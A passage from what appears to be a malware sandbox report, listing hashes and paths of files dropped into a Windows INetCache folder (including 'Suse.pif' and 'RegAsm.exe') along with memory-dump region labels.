| SHA1 | 41cb341f8d74bdf6ab2fcb6c5de2ef0fe4f2a209 |
| SHA256 | 9327b77e25664dcb9bc61d4af63acc998c528947d4628bdb59c8c3121f6c74af |
| SHA512 | 982105d230869a83cc7b002ce928720967417206bb0d748ca860dfa4c167554dc271756e1f5ca773490643a1d4c77383f287135202c40b1d37f4b2bf16998fca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Heart
| MD5 | ef90eff38af57e222a94fe9445264f79 |
| SHA1 | 15022846a434e73984808b3d844beda2bd794e43 |
| SHA256 | bf042e2854f6545cb3a1bf5a18e010ed72428a1d120655d5452264eff6c7c5f2 |
| SHA512 | ce96d72a17ec59dbf51dc1a30d492e45bfd09595c2938b7879308f727792d538fd92f345a2e23a14c3aad5a3f14a55184e1da0bf6311dd3d31e184d23581b35c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Rogers
| MD5 | d0f3d612fd98c067cbee5c1a9d191fb9 |
| SHA1 | 532cac39990879f4530c44cba0f7f4c6f5737817 |
| SHA256 | 4982dcc44f35e26ac9ab0c9a893e8c095b461e22cb8deb50f9146c8028c2da2d |
| SHA512 | ed6cdae54129de8bc5cdc020fdeb3d87a5259ff8d85ebcf5abee77499ed8f9c8e2dda1dbe679c467d21d6ab8897c230bbe9711878b8d4842fc9ba20d7f861127 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\America
| MD5 | 5ecf891e5790eca39dfc47de2642a290 |
| SHA1 | 3b7c0fd78edb35cbdcbb7fa0e58dd236b6072627 |
| SHA256 | b8b03938c9e19283c45c8b0f3c47719741ba93b5305c5be6f3f16ba96f58e017 |
| SHA512 | d4d960c261657ca817db72a1b8c2ffddee8f87009d46d91d1804b39a12ef9209b0c0a476195c4db1a25c1d865a22960c22eff18dd2f3e924ffb45fecc387114f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sealed
| MD5 | c979fd8c1c9972e5bf7f4121c363d8d1 |
| SHA1 | 1da51ad6a8b89c164095a82264a4dabaaf2f5693 |
| SHA256 | c0a872d2bb4cb884183f4c31d161005a5704a1ec91ef72bf6ede4f91e9fd3461 |
| SHA512 | defb9b133a59499544110cd99414cc11a669a61b4441057b5b43d94a983212be4e920e30e0d574411889aa75f925b6da987448880a4bdc28a08a5b8b1b88fc73 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Bomb
| MD5 | 432c3fb47d74bfaf66fad92ab18ebe2e |
| SHA1 | f91def68a64c7264bbb628bb3462ec852e58bb85 |
| SHA256 | 558a2cd4c4682aa34450b7076aa4ae85a0f258d4b52904d13a0404be4d91897b |
| SHA512 | 7b96c40798466a52325d03364ade9f2fc57553493fea6bcb83ed3dd3b73b6a8646d5870b77ca8d57fc71564a19efe213fe76982856200935ced5c882afd1a816 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Gr
| MD5 | ac36046d34acdbb2ca74a24a50cbd51e |
| SHA1 | 302aae6fdf37cd88ce7c59a02ce4f74ce0674900 |
| SHA256 | a1bd4270c698656f4ea48772a127d45d6dc81b23c33ea69b233ebe1b425cab3e |
| SHA512 | d8839258506bd448c76a674ec053a962a4d5f0dddec659f9cd36e2d2af4d50307f7dad7beb8eb56add8dc6048327310e03cee964343ecde3466d14ce72ec9b06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Grocery
| MD5 | 79445655d7e5636383812464b6357fe9 |
| SHA1 | 984c34514f98cc5629c722d05656d1461e5a0a59 |
| SHA256 | 1c7360c90613a8ef95e42017b474457a6a031c9e07c2a70f367f559420c542b0 |
| SHA512 | 78ea9b653d35788a451da91757be7bf48cae2d37274d773b6db04a783d1bbeaa892c79c9664e84d56a6b9f71ef9ab36c75663856ee4c05035ea9e0fb0064c340 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Wma
| MD5 | 0c0d45b09678e013f980ddd29471df41 |
| SHA1 | 40e95ece09bbb93211f3c10d5301a990f7fd45a6 |
| SHA256 | 9b49033aa0789d646c2b007960831faafa63e0643db365c90edc1725370ba42d |
| SHA512 | 1d339c47349c161ef1f34aeb06cdc411a667944cbbde0c1d8bed0490b9845f68f0edefdb0b762252d1e9acb4e0adb24ff5e444159f0743b7e828f031bbbd321e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Weeks
| MD5 | fdece249a5d06a1e3e483a1fb90adc11 |
| SHA1 | 4c7b38f058453381cdda55311321fbf5d4512852 |
| SHA256 | 306b5e9a26aed7e1fce882211ddd4f21dd52ad32a3da9faa6f4a6bf9be9830d9 |
| SHA512 | 42cc76f5f01b0ff56f8a4e2fd80c91fb58264a09be29ba8300625b0479e5dc8df5a71ed626d860b48d6e4c06911aac67b2c1fdb0b5c31cb47630dc5f1e9b7879 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Empty
| MD5 | f9db912fb6697a36aaff57fe92c53d7b |
| SHA1 | 50dac97644d0041b29b4da9ef8226294abd391d2 |
| SHA256 | c8a0d30ea5ab2b0dbdfcef9908bf7f1e1e8840f3248c2b8128e3234ce33dac55 |
| SHA512 | ad6fdee6f566de1a57730eccedcf5f838bb67e7fadb06f66fd0583750a9a6593b3fbf1c686a19f9926d0ee7a79f40e7cba3089539c03cd474bd491c3810017bb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Environments
| MD5 | 62b77ad8e1c448c98a17899bf03733fb |
| SHA1 | 2d3f165d8e2d99decbb1cfd7f5bfc6b53d8900bf |
| SHA256 | 2f754307b97b0f915751f4668bef0eeb209a091f4a64b3282fbba44215740a77 |
| SHA512 | 39d73bcec98ab7d72af590acc68659d33d0d08e9c231a5f65686365453079c1b66e7200d997dd71ceb16fd0908afa0eee4210d153ca624871e7db75187b75cb1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Identified
| MD5 | 6082167936c48350accec4e5a73345e2 |
| SHA1 | 9ee4d3b6fc70cee284a981b823074b52c9c97c5f |
| SHA256 | f2acd6c3c25755396b97706d999feacc41d649c846eca4c447d8c55808cba84d |
| SHA512 | b60d8c9256d4dfa4b3bc62dde7c4cad08fc0a27bef4c17fa963bc07577d392bb10bbf24fa98048046ef0011933971710aec067fc89b1caf589cfe29d52da5b0e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Alarm
| MD5 | a6342ebd229baed52bef276f6d98e45a |
| SHA1 | 22705bc04655919f9f907df9bb35f09eb225fd3c |
| SHA256 | 562a2f26bed375112b6b07de8deabe6cab519dd219426ccbd263215a0e34f308 |
| SHA512 | d3b48ebf1c7636512e42adab344a9384e798076970a9f8fae07b7bb612a88d430c90449253d02066546fa6d334fbb635129dda3a3e35417b126173a4c7427ae0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Measurements
| MD5 | 9ab2dcded3fc4ba015e8ec987e4229d7 |
| SHA1 | 0aaa4773d061ec53a27133e33296a4fa51fc0a0e |
| SHA256 | a119d3ff7398d4d3774e31dbf066bd1211e081848777b21bf9ac3ae5d3186179 |
| SHA512 | d0e9f5bdfb6e4aa0c22ce6510f8ddb59b645d53b8d9c86a2a5ccd4ec3c72338f2a3b4b7bea0970697caf28894539478c6b6be5d2b071c533799b8262bfda8535 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Asked
| MD5 | 6634844e4bc5c860419ee18ef5af3f71 |
| SHA1 | 3641e5c55e09ac3c79cb8569de6b5de4c300fd65 |
| SHA256 | 7fb6bc021397eee905c1bb7d23216b21bcb94bd7795d0bd1006237c56fcf4d2f |
| SHA512 | 0c4a1529ccf46a47c3135901e967e50fbc0fa41b6c4805acd7673c113e1d1e62c8551be7cb7cb8a4487d9b7c7907d9dfe6ee6bfa649fae79f76527046b1953c8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Report
| MD5 | 30bdb23ed924fed83d32c9a0e807d258 |
| SHA1 | 19c61b6d940418cd33d35b0cb9799c125c094775 |
| SHA256 | c041ead8e3a73b7172d894acf130330abe3c633b1d611ec0056283d939e52f4f |
| SHA512 | 70f877127dbb3eba87a0f6e273c13b629e5e76f8640df9907bb46aea44896aac98d8cddda94e8b2afb02d76ccb454be3be360f8df9c755eaa43746a133894c9c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif
| MD5 | b06e67f9767e5023892d9698703ad098 |
| SHA1 | acc07666f4c1d4461d3e1c263cf6a194a8dd1544 |
| SHA256 | 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb |
| SHA512 | 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\t
| MD5 | 9353f07f92f74999c1befc17a611b4f8 |
| SHA1 | cef59bfdee8c304b718b48a7ae396f932f1974c3 |
| SHA256 | 6a8181307afaf192a4bb0b20a9707c5be09faa9e82f1ef96682849c45480bd3e |
| SHA512 | 5e715f7d5d29efe8d8d90f3522c2570862636d93cefa21fc16d9589c000a373c9f0364886041c7b034cce882ba18a873fb8c9a3bb9f0104dea4a168f2a4a9af3 |
memory/1440-384-0x00000000013B0000-0x00000000013C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe
| MD5 | 0d5df43af2916f47d00c1573797c1a13 |
| SHA1 | 230ab5559e806574d26b4c20847c368ed55483b0 |
| SHA256 | c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc |
| SHA512 | f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2 |
memory/1440-387-0x00000000058B0000-0x000000000594C000-memory.dmp
memory/1440-388-0x0000000006770000-0x0000000006802000-memory.dmp
memory/1440-389-0x0000000006710000-0x000000000671A000-memory.dmp